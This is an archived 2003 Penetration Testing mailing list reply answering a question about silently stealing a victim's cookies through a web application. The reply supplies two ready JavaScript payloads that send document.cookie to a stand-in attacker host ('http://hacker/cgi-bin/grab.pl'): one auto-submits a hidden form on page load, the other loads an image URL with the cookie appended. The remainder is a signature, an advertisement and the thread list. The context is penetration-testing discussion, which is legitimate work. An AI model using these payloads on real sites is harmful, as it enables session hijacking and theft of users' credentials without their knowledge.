Penetration Testing mailing list archives
RE: Proof of Concept Tool on Web Application Security
From: Nicolas Gregoire <ngregoire () exaprobe com>
Date: 14 Apr 2003 17:23:31 +0200
On Sun, 2003-04-13 at 09:33, Indian Tiger wrote:
One way of transferring cookie information from the victims machine to attackers machine is to create a hidden filed & then transfer cookie information to that hidden field & then post (submit) this hidden field to web site of attacker. But this require interaction of victim, as victim must click on submit button to post this data to attackers site, which is not a good idea, the data should be transferred without knowledge of victim.
I'm not sure I well understand your problem but you can : - use Javascript to sumbit a form <body onLoad=document.forms.upld.submit();> <form method="post" name="upld" action="http://hacker/cgi-bin/grab.pl"> <input ....> </form> - transfer the cookie via a IMG tag and some Javascript <img name="owned" src="http://hacker/cool.gif"> <script> document.owned.src="http://hacker/cgi-bin/grab.pl?data=" +escape(document.cookie); </script> That's just some of the many ways to steal cookies. Enjoy ... -- Nicolas Gregoire ----- Consultant en Sécurité des Systèmes d'Information ngregoire () exaprobe com ------[ ExaProbe ]------ http://www.exaprobe.com/ PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F -------------------------------------------------------------- Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it. http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just what's going in and out of your organization. --------------------------------------------------------------
Current thread:
- Proof of Concept Tool on Web Application Security Indian Tiger (Apr 10)
- Re: Proof of Concept Tool on Web Application Security Jörg Schütter (Apr 27)
- <Possible follow-ups>
- RE: Proof of Concept Tool on Web Application Security Einecker, Leah (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Nicolas Gregoire (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Robert Auger (Apr 14)
- Re: Proof of Concept Tool on Web Application Security Jon Pastore (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 24)
- For Indian Tiger - Pen test lab Sam (Apr 27)